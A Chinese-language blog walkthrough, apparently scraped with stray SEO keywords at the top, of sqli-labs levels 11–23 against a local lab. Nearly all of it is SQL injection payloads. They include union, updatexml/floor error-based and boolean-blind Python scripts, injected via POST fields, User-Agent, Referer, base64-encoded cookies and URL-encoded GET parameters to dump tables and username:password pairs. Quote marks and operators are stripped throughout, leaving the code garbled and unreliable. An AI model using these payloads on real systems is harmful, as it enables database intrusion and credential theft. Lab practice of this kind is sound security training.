网站建设淄博,建站平台与自己做网站,物业管理信息系统,电商平台的营销策略sql靶场#xff08;11-23#xff09;
目录
第十一关#xff08;post注入#xff09;
第十二关
第十三关
第十四关
第十五关
第十六关
第十七关
第十八关
第十九关
第二十关
第二十一关
第二十二关
第二十三关 第十一关#xff08;post注入#xff09;
查看…sql靶场11-23
目录
第十一关post注入
第十二关
第十三关
第十四关
第十五关
第十六关
第十七关
第十八关
第十九关
第二十关
第二十一关
第二十二关
第二十三关 第十一关post注入
查看页面 我们发现是有注入点的所以我们可以尝试使用联合查询注入 我们发现联合查询注入是可行的接下来就是该爆数据库、表、字段和用户账号密码
aaa union select 1,database()#
aaa union select 1,group_concat(table_name) from information_schema.tables where table_schema security#
aaa union select 1,group_concat(column_name) from information_schema.columns where table_nameusers#
aaa union select 1,group_concat(username ,0x3a , password) from users#结果 第十二关
查看页面 尝试之后发现这一关和十一关只是闭合方式不同
aaa) union select 1,database()#
aaa) union select 1,group_concat(table_name) from information_schema.tables where table_schema security#
aaa) union select 1,group_concat(column_name) from information_schema.columns where table_nameusers#
aaa) union select 1,group_concat(username ,0x3a , password) from users#结果 第十三关
查看页面经过测试发现只有报错注入可以回显同时闭合方式也和之前有所不同。 aaa) and updatexml(1,user(),1)#
aaa) and updatexml(1,concat(~,(select database()),~),1)#
aaa) and updatexml(1,concat(0x7e,(select group_concat(table_name)from information_schema.tables where table_schemasecurity),0x7e),1)#
aaa) and updatexml(1,concat(0x7e,(select group_concat(column_name)from information_schema.columns where table_schema security and table_nameusers),0x7e),1)#
aaa) and updatexml(1,concat(0x7e,(select concat(username,0x3a,password)from users limit 0,1),0x7e),1)#
由于只能显示一个字段所以我们使用limit进行逐个输出我这里只输出第一组用户名和密码其余自己进行 第十四关
查看页面经过测试发现这一关和第十三关只是闭合方式不同所以我们依旧需要使用报错注入进行注入 aaa and updatexml(1,user(),1)#
aaa and updatexml(1,concat(~,(select database()),~),1)#
aaa and updatexml(1,concat(0x7e,(select group_concat(table_name)from information_schema.tables where table_schemasecurity),0x7e),1)#
aaa and updatexml(1,concat(0x7e,(select group_concat(column_name)from information_schema.columns where table_schema security and table_nameusers),0x7e),1)#
aaa and updatexml(1,concat(0x7e,(select concat(username,0x3a,password)from users limit 0,1),0x7e),1)#
结果 第十五关
查看页面经过不断测试发现页面只有成功与失败两个界面所以我的第一想法就是布尔盲注 所以我们使用脚本直接爆出来这关
import requests#爆破数据库名
# def inject_database(url):
# name
# for i in range(1, 20):
# min_value 32
# max_value 128
# mid (min_value max_value) // 2
# while min_value max_value:
# data {
# uname: aaaa or ascii(substr(database(),%d,1)) %d# % (i,mid),
# passwd: aaa
# }
# r requests.post(urlurl, datadata)
# if flag.jpg in r.text:
# min_value mid 1
# else:
# max_value mid
# mid (min_value max_value) // 2
# if mid 32:
# break
# name chr(mid)
# print(name)
# return name#爆破表名
# def inject_database(url):
# name
# for i in range(1, 20):
# min_value 32
# max_value 128
# mid (min_value max_value) // 2
# while min_value max_value:
# data {
# uname: aaa or ascii(substr((select group_concat(table_name) from information_schema.tables where table_schemasecurity), %d, 1)) %d# % (i, mid),
# passwd: aaa
# }
# r requests.post(urlurl, datadata)
# if flag.jpg in r.text:
# min_value mid 1
# else:
# max_value mid
# mid (min_value max_value) // 2
# if mid 32:
# break
# name chr(mid)
# print(name)
# return name#爆破列名
# def inject_database(url):
# name
# for i in range(1, 20):
# min_value 32
# max_value 128
# mid (min_value max_value) // 2
# while min_value max_value:
# data {
# uname: aaa or ascii(substr((select group_concat(column_name) from information_schema.columns where table_schema security and table_name users), %d, 1)) %d# % (i, mid),
# passwd: aaa
# }
# r requests.post(urlurl, datadata)
# if flag.jpg in r.text:
# min_value mid 1
# else:
# max_value mid
# mid (min_value max_value) // 2
# if mid 32:
# break
# name chr(mid)
# print(name)
# return name#爆破用户和密码
def inject_database(url):name for i in range(1, 20):min_value 32max_value 128mid (min_value max_value) // 2while min_value max_value:data {uname: aaa or ascii(substr((select group_concat(username, 0x3a, password) from users), %d, 1)) %d# % (i, mid),passwd: aaa}r requests.post(urlurl, datadata)if flag.jpg in r.text:min_value mid 1else:max_value midmid (min_value max_value) // 2if mid 32:breakname chr(mid)print(name)return nameif __name__ __main__:url http://127.0.0.1/sqllabs/Less-15/inject_database(url)
结果 第十六关
查看页面发现这一关和第十五关只有闭合方式不一样
import requests#爆破数据库名
# def inject_database(url):
# name
# for i in range(1, 20):
# min_value 32
# max_value 128
# mid (min_value max_value) // 2
# while min_value max_value:
# data {
# uname: aaaa) or ascii(substr(database(),%d,1)) %d# % (i,mid),
# passwd: aaa
# }
# r requests.post(urlurl, datadata)
# if flag.jpg in r.text:
# min_value mid 1
# else:
# max_value mid
# mid (min_value max_value) // 2
# if mid 32:
# break
# name chr(mid)
# print(name)
# return name#爆破表名
# def inject_database(url):
# name
# for i in range(1, 20):
# min_value 32
# max_value 128
# mid (min_value max_value) // 2
# while min_value max_value:
# data {
# uname: aaa) or ascii(substr((select group_concat(table_name) from information_schema.tables where table_schemasecurity), %d, 1)) %d# % (i, mid),
# passwd: aaa
# }
# r requests.post(urlurl, datadata)
# if flag.jpg in r.text:
# min_value mid 1
# else:
# max_value mid
# mid (min_value max_value) // 2
# if mid 32:
# break
# name chr(mid)
# print(name)
# return name#爆破列名
# def inject_database(url):
# name
# for i in range(1, 20):
# min_value 32
# max_value 128
# mid (min_value max_value) // 2
# while min_value max_value:
# data {
# uname: aaa) or ascii(substr((select group_concat(column_name) from information_schema.columns where table_schema security and table_name users), %d, 1)) %d# % (i, mid),
# passwd: aaa
# }
# r requests.post(urlurl, datadata)
# if flag.jpg in r.text:
# min_value mid 1
# else:
# max_value mid
# mid (min_value max_value) // 2
# if mid 32:
# break
# name chr(mid)
# print(name)
# return name#爆破用户和密码
def inject_database(url):name for i in range(1, 20):min_value 32max_value 128mid (min_value max_value) // 2while min_value max_value:data {uname: aaa) or ascii(substr((select group_concat(username, 0x3a, password) from users), %d, 1)) %d# % (i, mid),passwd: aaa}r requests.post(urlurl, datadata)if flag.jpg in r.text:min_value mid 1else:max_value midmid (min_value max_value) // 2if mid 32:breakname chr(mid)print(name)return nameif __name__ __main__:url http://127.0.0.1/sqllabs/Less-16/inject_database(url)
结果 第十七关
这一关查看源码后发现username不能进行注入了但是password依然可以进行注入但是这就有一个前提条件就是username必须输入正确。可以这一关的页面后发现这一关其实就是改密码既然是改密码那么你就必须知道用户名了 证明我的想法是正确的就是在密码这里进行注入
aaa and updatexml(1,user(),1)#
aaa and updatexml(1,concat(~,(select database()),~),1)#
1 and updatexml(1,concat(0x7e,(select group_concat(table_name)from information_schema.tables where table_schemasecurity),0x7e),1)#
1 and updatexml(1,concat(0x7e,(select group_concat(column_name)from information_schema.columns where table_schema security and table_nameusers),0x7e),1)#
1 and (select 1 from (select count(*),concat(concat(0x7e,(select concat(username,0x3a,password)from users limit 0,1),0x7e),floor(rand(0)*2))x from information_schema.tables group by x)a)#
结果 很明显成功爆出来用户名和密码啦想要继续爆就修改limit后面的参数就可以啦。
第十八关
查看页面
这一关经过测试感觉和之前的有些区别啦这时候我分析源码后发现注入点在user-agent上所以我们可以试着抓包进行注入使用抓包工具burpsuite进行抓包
首先使用proxy模块进行抓包抓取后发送到repeater模块进行分析修改 很明显可以看出来有注入点啦
aaa and updatexml(1,concat(0x7e,(select user()),0x7e),1) and 11aaa and updatexml(1,concat(~,(select database()),~),1) and 111 and updatexml(1,concat(0x7e,(select group_concat(table_name)from information_schema.tables where table_schemasecurity),0x7e),1) and 111 and updatexml(1,concat(0x7e,(select group_concat(column_name)from information_schema.columns where table_schema security and table_nameusers),0x7e),1) and 111 and (select 1 from (select count(*),concat(concat(0x7e,(select concat(username,0x3a,password)from users limit 0,1),0x7e),floor(rand(0)*2))x from information_schema.tables group by x)a) and 11 很明显成功爆出来了他的用户名和密码。
第十九关
查看页面感觉这一关和十八关有些类似
我直接进行了抓包通过不断测试发现注入点在referer上面 那么我就可以直接注入了
aaa and updatexml(1,concat(0x7e,(select user()),0x7e),1) and 11aaa and updatexml(1,concat(~,(select database()),~),1) and 111 and updatexml(1,concat(0x7e,(select group_concat(table_name)from information_schema.tables where table_schemasecurity),0x7e),1) and 111 and updatexml(1,concat(0x7e,(select group_concat(column_name)from information_schema.columns where table_schema security and table_nameusers),0x7e),1) and 111 and (select 1 from (select count(*),concat(concat(0x7e,(select concat(username,0x3a,password)from users limit 0,1),0x7e),floor(rand(0)*2))x from information_schema.tables group by x)a) and 11
结果 第二十关
查看页面并登录成功后发现cookie在页面中有点突出 所以直接抓包修改cookie看是不是注入点结果显而易见是注入点 aaa and updatexml(1,concat(0x7e,(select user()),0x7e),1) and 11aaa and updatexml(1,concat(~,(select database()),~),1) and 111 and updatexml(1,concat(0x7e,(select group_concat(table_name)from information_schema.tables where table_schemasecurity),0x7e),1) and 111 and updatexml(1,concat(0x7e,(select group_concat(column_name)from information_schema.columns where table_schema security and table_nameusers),0x7e),1) and 11admin and (select 1 from (select count(*),concat(concat(0x7e,(select concat(username,0x3a,password)from users limit 0,1),0x7e),floor(rand(0)*2))x from information_schema.tables group by x)a) and 11
结果 第二十一关
查看页面并成功登录后发现页面cookie进行了编码 那么我有理由猜测吧payload进行编码再注入会不会爆出东西呢试一试 看来我猜测是没错那么接下来就是把payload语句进行base64编码后在进行注入这里不得不说burpsuite的优势了自带编码模块感觉挺爽得啦payload放下面啦自己进行编码吧
aaa and updatexml(1,concat(0x7e,(select user()),0x7e),1) and 11aaa and updatexml(1,concat(~,(select database()),~),1) and 111 and updatexml(1,concat(0x7e,(select group_concat(table_name)from information_schema.tables where table_schemasecurity),0x7e),1) and 111 and updatexml(1,concat(0x7e,(select group_concat(column_name)from information_schema.columns where table_schema security and table_nameusers),0x7e),1) and 11admin and (select 1 from (select count(*),concat(concat(0x7e,(select concat(username,0x3a,password)from users limit 0,1),0x7e),floor(rand(0)*2))x from information_schema.tables group by x)a) and 11
结果 第二十二关
查看页面并成功登录后发现页面的cookie依然进行了编码那我有理由怀疑是不是闭合方式变了呢直接试一试 因为这个也是需要进行base64编码自己进行编码
aaa and updatexml(1,concat(0x7e,(select user()),0x7e),1) and 11aaa and updatexml(1,concat(~,(select database()),~),1) and 111 and updatexml(1,concat(0x7e,(select group_concat(table_name)from information_schema.tables where table_schemasecurity),0x7e),1) and 111 and updatexml(1,concat(0x7e,(select group_concat(column_name)from information_schema.columns where table_schema security and table_nameusers),0x7e),1) and 11admin and (select 1 from (select count(*),concat(concat(0x7e,(select concat(username,0x3a,password)from users limit 0,1),0x7e),floor(rand(0)*2))x from information_schema.tables group by x)a) and 11
结果 第二十三关
查看页面后发现这一关又回到了我们的老朋友GET传参啦 试过好多后无从下手解读源代码后发现这一关进行了过滤
想了一下既然过滤了注释符娜美我们直接进行闭合试一试 经过测试发现我的想法是可行的
那么进行全过程是爆破吧
爆表
http://127.0.0.1/sqllabs/less-23/?id-1%27%20union%20select%201,2,group_concat(table_name)%20from%20information_schema.tables%20where%20table_schema%20%27security%27%20and%20%271%27%271爆字段
http://127.0.0.1/sqllabs/less-23/?id-1%27%20union%20select%201,2,group_concat(column_name)%20from%20information_schema.columns%20where%20table_name%27users%27%20and%20%271%27%271爆用户和密码
http://127.0.0.1/sqllabs/less-23/?id-1%27%20union%20select%201,2,group_concat(username%20,0x3a%20,%20password)%20from%20users%20where%20%271%27%271
结果 接下来的24关我会放在单独的一片文档中因为24关事二次注入所以我还会引入两个ctf的二次注入
